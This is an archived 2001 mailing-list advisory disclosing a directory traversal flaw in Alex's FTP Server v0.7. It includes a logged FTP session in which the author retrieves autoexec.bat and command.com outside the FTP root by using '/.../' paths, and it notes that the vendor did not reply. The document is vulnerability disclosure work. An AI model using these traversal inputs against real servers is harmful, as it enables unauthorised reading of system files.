----- Begin Hush Signed Message from joetestaat_private ----- Vulnerabilities in Alex's FTP Server Overview Alex's Ftp Server v0.7 is an ftp server available from http://www.alex.feedback.net. Vulnerabilities exist which allow a user to break out of the ftp root. Details The following is an illustration of the problem. An ftp root of 'c:\directory\directory' was used: Connected to xxxxxxxxxx.rh.rit.edu. 220 xxxxxxxxxx FTP version 0.7 ready at Fri Apr 20 23:17:32 2001 User (xxxxxxxxxx.rh.rit.edu:(none)): jdog 331 Enter PASS command Password: 230 Logged in ftp> get /.../autoexec.bat 200 Port command okay 150 Opening data connection for retr "/.../autoexec.bat" 226 Transfer complete ftp: 411 bytes received in 0.00Seconds 411000.00Kbytes/sec. ftp> cd ... 257 "/.../" is current directory ftp> get command.com 200 Port command okay 150 Opening data connection for retr "/.../command.com" 226 Transfer complete ftp: 85 bytes received in 0.00Seconds 85000.00Kbytes/sec. ftp> Solution No quick fix is possible. Vendor Status Alex Linde was contacted via <alex.lindeat_private> on Friday, April 20, 2001. No reply was received. - Joe Testa e-mail: joetestaat_private web page: http://hogs.rit.edu/~joet AIM: LordSpankatron ----- Begin Hush Signature v1.3 ----- EQcZaZRY8qHbXEoNyX08XELi9dxKdjm2FqldEP7+Sl5CfDejO0PaPKe/uBYxHXEnkM2u 44EjodbwrUqAF7M64TA8mDMqpuUwx2NnDlCkvbLMMe5pbVUER/tFD2R4WdD/94j/vtU6 vLq31tg7Z3jKDgOasR3q9RUb9zsLWjN01FGjSwBQIy2pP+jBaK6Edt7O5oSU1OisSAbH 9IJF/nx9PovvNSqUqsmz/nbywYuN/CZTURgRfw584aKpidxKB+zrWrmq+wf/WzXxAooI W3J7tpHQV2+Osu/f+w5HkS2yc2XWo6gcdAjOySGiA71OL18BLEF6avPFnKfUpFsE4NQ9 vVuYaI86jMyPlnJd2Rg9HYxxnU80Uu3s8ZLAIwLflbRqyDHk9P4Ivus5hQd0EDs5cjyE ALYP9twX/Q86/5fz7qXFR/pJv6kmFr0eOKZdv1zOFES6eVYfdyJeLjhqbTa32BI/88l4 ywYMSBgRmg7W3eWWcs+FnGbzmMNX7sPUv9m5vIZjPtf/ ----- End Hush Signature v1.3 ----- This message has been signed with a Hush Digital Signature. To verify the signature, please go to www.hush.com/tools Free, encrypted, secure Web-based email at www.hushmail.com
This archive was generated by hypermail 2b30 : Mon Apr 30 2001 - 00:18:54 PDT